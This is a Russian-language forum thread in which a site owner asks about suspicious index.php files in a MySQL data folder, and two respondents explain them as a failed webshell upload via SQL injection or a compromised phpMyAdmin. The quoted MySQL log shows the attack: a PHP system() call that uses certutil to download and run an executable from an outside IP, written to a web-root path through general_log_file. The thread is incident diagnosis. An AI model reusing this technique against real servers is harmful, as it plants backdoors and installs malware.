@Snewer

Откуда взялись подозрительные файлы в папке данных mysql?

Здравствуйте!

Заметил в папке с данными MySQL подозрительные PHP файлы:

auto.cnf
ca-key.pem
ca.pem
C:AppServwwwindex.php
client-cert.pem
client-key.pem
C:phpStudyPHPTutorialWWWindex.php
C:phpStudyWWWindex.php
C:PHPTutorialWWWindex.php
C:xampphtdocsindex.php
D:phpStudyPHPTutorialWWWindex.php
D:phpStudyWWWindex.php
D:PHPTutorialWWWindex.php
E:phpStudyPHPTutorialWWWindex.php
E:phpStudyWWWindex.php
E:PHPTutorialWWWindex.php

ib_buffer_pool
ibdata1
ib_logfile0
ib_logfile1
ibtmp1
mysql
performance_schema
private_key.pem
public_key.pem
server-cert.pem
server-key.pem
sys

Пример содержимого:
2018-12-23T08:01:47.597864Z     11192 Query     SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
2018-12-23T08:01:47.799769Z     11192 Query     set global general_log='on'
2018-12-23T08:01:47.985474Z     11192 Query     SET global general_log_file='C:\xampp\htdocs\index.php'


Что можете сказать по этому поводу? Спасибо.
  • Вопрос задан
  • 107 просмотров
Пригласить эксперта
Ответы на вопрос 2
vesper-bot
@vesper-bot
Любитель файрволлов
У тебя в веб-сайте есть некий элемент, позволяющий залить файлы, его попытались ломануть, заливая шелл или бэкдор, а путь, куда заливать, не смогли нормально подобрать (либо какой-то из каталогов, открытый на запись, в настройках веб-сервера указывает на каталог базы данных, скорее всего и то и другое). Тебя спасло то, что сервер у тебя на линуксе, а атакующий пытался ломануть винды. Возможно, тебе взломали phpmyadmin-компонент (подобрали пароль, например). В общем жопа сайту, перезалей контент, обнови движок и забэкапь базу, и внимательно смотри конфиг веб-сервера, чтобы не было в нем посторонних каталогов, которые в принципе не должны светиться наружу.
Ответ написан
@BorisKorobkov
Web developer
На вашем сайте есть SQL-инъекция. Полный доступ к БД атакующие уже получили, сейчас пытаются залить бэкдор.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через TM ID
Похожие вопросы